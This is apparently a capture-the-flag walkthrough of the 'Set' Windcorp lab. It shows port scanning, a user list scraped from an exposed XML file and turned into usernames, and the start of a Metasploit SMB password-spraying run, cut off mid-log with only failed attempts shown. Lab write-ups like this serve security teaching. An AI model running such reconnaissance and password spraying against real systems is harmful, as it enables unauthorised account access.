Set
Start Machine
Story
Once again you find yourself on the internal network of the Windcorp Corporation. This tasted so good last time you were there, you came back for more.
However, they managed to secure the Domain Controller this time, so you need to find another server and on your first scan discovered "Set".
Set is used as a platform for developers and has had some problems in the recent past. They had to reset a lot of users and restore backups (maybe you were not the only hacker on their network?). So they decided to make sure all users used proper passwords and closed of some of the loose policies. Can you still find a way in? Are some user more privileged than others? Or some more sloppy? And maybe you need to think outside the box a little bit to circumvent their new security controls…
Happy Hacking!
@4nqr34z and @theart42
(Give it at least 5 minutes to boot)
Answer the questions below
┌──(kali㉿kali)-[~]
└─$ ping 10.10.242.97
PING 10.10.242.97 (10.10.242.97) 56(84) bytes of data.
^C
--- 10.10.242.97 ping statistics ---
5 packets transmitted, 0 received, 100% packet loss, time 4092ms
┌──(kali㉿kali)-[~]
└─$ rustscan -a 10.10.242.97 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.242.97:135
Open 10.10.242.97:443
Open 10.10.242.97:445
Open 10.10.242.97:5985
Open 10.10.242.97:49667
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-02 10:05 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:05
Completed NSE at 10:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:05
Completed NSE at 10:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:05
Completed NSE at 10:05, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 10:05
Completed Parallel DNS resolution of 1 host. at 10:05, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:05
Scanning 10.10.242.97 [5 ports]
Discovered open port 443/tcp on 10.10.242.97
Discovered open port 135/tcp on 10.10.242.97
Discovered open port 445/tcp on 10.10.242.97
Discovered open port 49667/tcp on 10.10.242.97
Discovered open port 5985/tcp on 10.10.242.97
Completed Connect Scan at 10:05, 0.21s elapsed (5 total ports)
Initiating Service scan at 10:05
Scanning 5 services on 10.10.242.97
Completed Service scan at 10:06, 57.06s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.242.97.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:06
NSE Timing: About 99.86% done; ETC: 10:07 (0:00:00 remaining)
Completed NSE at 10:07, 41.13s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:07
Completed NSE at 10:07, 1.75s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:07
Completed NSE at 10:07, 0.00s elapsed
Nmap scan report for 10.10.242.97
Host is up, received user-set (0.21s latency).
Scanned at 2023-01-02 10:05:49 EST for 100s
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
443/tcp open ssl/http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=set.windcorp.thm
| Subject Alternative Name: DNS:set.windcorp.thm, DNS:seth.windcorp.thm
| Issuer: commonName=set.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-06-07T15:00:22
| Not valid after: 2036-10-07T15:10:21
| MD5: d0eb717cf7ef351500d25d674bebdd69
| SHA-1: 95714370bd9bcc8008ef7d1e0dfcbbc2251ce077
| -----BEGIN CERTIFICATE-----
| MIIDQTCCAimgAwIBAgIQPqCqVnulP4RF1x6k8HNXqDANBgkqhkiG9w0BAQsFADAb
| MRkwFwYDVQQDDBBzZXQud2luZGNvcnAudGhtMB4XDTIwMDYwNzE1MDAyMloXDTM2
| MTAwNzE1MTAyMVowGzEZMBcGA1UEAwwQc2V0LndpbmRjb3JwLnRobTCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAMm4DQZ+hDcuel1PQ+DKGJXKo8dF2mR+
| SJHlyPssa2iZx43jTijsYp+MxRPxSYzSuDy5M0eOIySHBN0JGWSKHLclNiwhDgAU
| niPdrrPgreA1Hs1Zw5UN7iLEz56R7NhEPctUwZb6+ETjO4x91TU3JMenEF+1ZLv3
| ss3X3MXKdv8y/KuHNPXsFf1ubioYKV3gmdsSlwLQpcATQ7LjeMdncAN62/OvXpVQ
| sFAdJkO1/LXIJquNdMzdim3PvFyPBStY6oX9sD5AiJ9/iMa91aqYjL8MXw7zPS4N
| FKpW/Ksx1AxbG41LQieEeGwEcC6Yq2ohSUNk3/RUrUA3IxN3up94t20CAwEAAaOB
| gDB+MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUH
| AwEwLgYDVR0RBCcwJYIQc2V0LndpbmRjb3JwLnRobYIRc2V0aC53aW5kY29ycC50
| aG0wHQYDVR0OBBYEFNQ2+9chAM4hq3nKcxQtg8Ah/1A/MA0GCSqGSIb3DQEBCwUA
| A4IBAQBB6BNqxh1cxyeeQ2D1VQ4D7nqGjp0oLNuwFFVd1Pk9f0aWWm0w1ovqOcCR
| 8BrCTJJlk/FjIYUrqLBvgkyFx7cL706tEGrFtZwi1KtMg8qReBQQBYVKa7jjN8/U
| dWRrbYwNuPmmojFZ1dZWilw++vCSkXxIKHbP6vvZDs7XewFYCT3Snbo/gFc3FCdy
| DwXM5ZQkzZnfTs6dAURqf8L7AVMxwBLow1Wl3nLuxoFQ3ypu5AyWCLROK8n5h82h
| mJLZQ6ectkh1JzoHaP8zA0Q0hxMvflatVAUDSztATJ7bJ81yok9I1eA4Eu+QI+sO
| 2yLhYxKlaeRK4AJ226n7dOxyrr8d
|_-----END CERTIFICATE-----
|_ssl-date: 2023-01-02T15:07:28+00:00; 0s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp open microsoft-ds? syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49667/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-01-02T15:06:49
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 56458/tcp): CLEAN (Timeout)
| Check 2 (port 28839/tcp): CLEAN (Timeout)
| Check 3 (port 6182/udp): CLEAN (Timeout)
| Check 4 (port 30620/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:07
Completed NSE at 10:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:07
Completed NSE at 10:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:07
Completed NSE at 10:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.20 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ tail /etc/hosts
10.129.105.231 s3.thetoppers.htb
10.10.11.180 shoppy.htb
10.10.11.180 mattermost.shoppy.htb
#10.10.219.166 windcorp.thm
10.10.85.102 fire.windcorp.thm
10.10.85.102 selfservice.windcorp.thm
10.10.85.102 selfservice.dev.windcorp.thm
10.10.167.117 team.thm
10.10.167.117 dev.team.thm
10.10.242.97 set.windcorp.thm
https://set.windcorp.thm/
view-source:https://set.windcorp.thm/
<script src="assets/js/search.js"> </script>
go to
xmlhttp.open("GET", "assets/data/users.xml" , true);
view-source:https://set.windcorp.thm/assets/data/users.xml
there are names and emails
┌──(kali㉿kali)-[~/Set]
└─$ curl -k https://set.windcorp.thm/assets/data/users.xml -o users.xml
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 12419 100 12419 0 0 14214 0 --:--:-- --:--:-- --:--:-- 14258
┌──(kali㉿kali)-[~/Set]
└─$ cat users.xml
<?xml version="1.0"?>
<results_table>
<row>
<name>Aaron Wheeler</name>
<phone>9553310397</phone>
<email>aaronwhe@windcorp.thm</email>
</row>
<row>
<name>Addison Russell</name>
<phone>9425499327</phone>
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u https://set.windcorp.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -k -x txt,php,py,html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://set.windcorp.thm/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,php,py
[+] Timeout: 10s
===============================================================
2023/01/02 10:20:35 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 42259]
/blog.html (Status: 200) [Size: 17537]
/assets (Status: 301) [Size: 155] [--> https://set.windcorp.thm/assets/]
/forms (Status: 301) [Size: 154] [--> https://set.windcorp.thm/forms/]
/Index.html (Status: 200) [Size: 42259]
/Blog.html (Status: 200) [Size: 17537]
/Forms (Status: 301) [Size: 154] [--> https://set.windcorp.thm/Forms/]
/Assets (Status: 301) [Size: 155] [--> https://set.windcorp.thm/Assets/]
/INDEX.html (Status: 200) [Size: 42259]
/appnotes.txt (Status: 200) [Size: 146]
https://set.windcorp.thm/appnotes.txt
Notes for the new user-module.
Send mail to user:
Welcome to Set!
Remember to change your default password at once. It is too common.
(password spraying attack vector to username)
┌──(kali㉿kali)-[~/Set]
└─$ awk -F'[<>]' '/email/ {sub("@windcorp.thm", "", $3); print $3}' users.xml
aaronwhe
addisonrus
aidenboy
alicepet
allisonnea
alyssabak
andreacur
andreahar
andreaste
andrewpow
aubreehop
beckywel
bernardmck
billiehil
billierya
brandonspe
brandyrod
braydenhaw
braydenweb
byronwil
calebrod
chloewes
christinerui
clairehay
craigmcd
danaros
danielletho
darrellpea
donbur
donper
ednahow
ednaper
ednarey
eugenewoo
fernandohun
flennrod
floydpet
gabrielall
gertrudewil
gilberttay
glendasny
gordonban
harveyrey
heidiwat
herminiacol
hollywel
hughfos
ivanray
jamiegra
janicekim
jasonper
jaydenhun
jillbec
jimmiebar
jimmypor
josebyr
juanitaram
juliocra
kayhar
kellyjen
kittymar
kristinfre
leahbur
leahlar
lenamoo
lesarog
maegut
marjorieada
masonmor
maxdou
meghancha
meghanhol
michellewat
miriamwar
myrtleowe
nataliearm
nataliepen
nathanielmar
nicholasram
normanand
normantur
owenkel
pamelagre
peggyhal
pennyray
peytonjam
phyllisric
priscillanew
randygre
reneeluc
rickyree
robertaphi
rodneyhen
rogermey
rosemarywes
rosenew
rosspow
roymas
rubensch
sallyhan
sallyort
sallyste
salvadorlee
sethhic
sohamkel
sohamtuc
sophiaboy
stephanierey
susansta
tammyjoh
thomasweb
tomand
veranic
vivangar
waderey
walterpal
waynewoo
wendyrob
wyattwhe
zacksul
┌──(kali㉿kali)-[~/Set]
└─$ awk -F'[<>]' '/email/ {sub("@windcorp.thm", "", $3); print $3}' users.xml > users_final.txt
using chatgpt :)
Este comando dividirá cada línea en campos cada vez que encuentre el carácter "<" o ">", y luego reemplazará la subcadena "@windcorp.thm" por una cadena vacía en el tercer campo (que es la dirección de correo electrónico). Por último, imprimirá el tercer campo (la dirección de correo electrónico sin el dominio) de las líneas que contengan la cadena "email".
┌──(kali㉿kali)-[/usr/share/seclists/Passwords/Common-Credentials]
└─$ cat top-20-common-SSH-passwords.txt
root
toor
raspberry
dietpi
test
uploader
password
admin
administrator
marketing
12345678
1234
12345
qwerty
webadmin
webmaster
maintenance
techsupport
letmein
logon
Passw@rd
alpine
┌──(kali㉿kali)-[/usr/share/seclists/Passwords/Common-Credentials]
└─$ pwd
/usr/share/seclists/Passwords/Common-Credentials
Now using msf
┌──(kali㉿kali)-[~/Set]
└─$ msfconsole -q
msf6 > search smb_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login
msf6 > use 0
msf6 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current databas
e
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (A
ccepted: none, user, user&realm)
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...
]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploi
t-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one
pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.242.97
RHOSTS => 10.10.242.97
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
PASS_FILE => /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
msf6 auxiliary(scanner/smb/smb_login) > set USER_FILE users_final.txt
USER_FILE => users_final.txt
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.242.97:445 - 10.10.242.97:445 - Starting SMB login bruteforce
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:root',
[!] 10.10.242.97:445 - No active DB -- Credential data will not be saved!
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aaronwhe:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\addisonrus:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\aidenboy:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alicepet:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\allisonnea:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\alyssabak:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:test',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:uploader',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:password',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:admin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:administrator',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:marketing',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:12345678',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:1234',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:12345',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:qwerty',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:webadmin',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:webmaster',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:maintenance',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:techsupport',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:letmein',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:logon',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:Passw@rd',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreacur:alpine',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreahar:root',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreahar:toor',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreahar:raspberry',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreahar:dietpi',
[-] 10.10.242.97:445 - 10.10.242.97:445 - Failed: '.\andreahar:test',
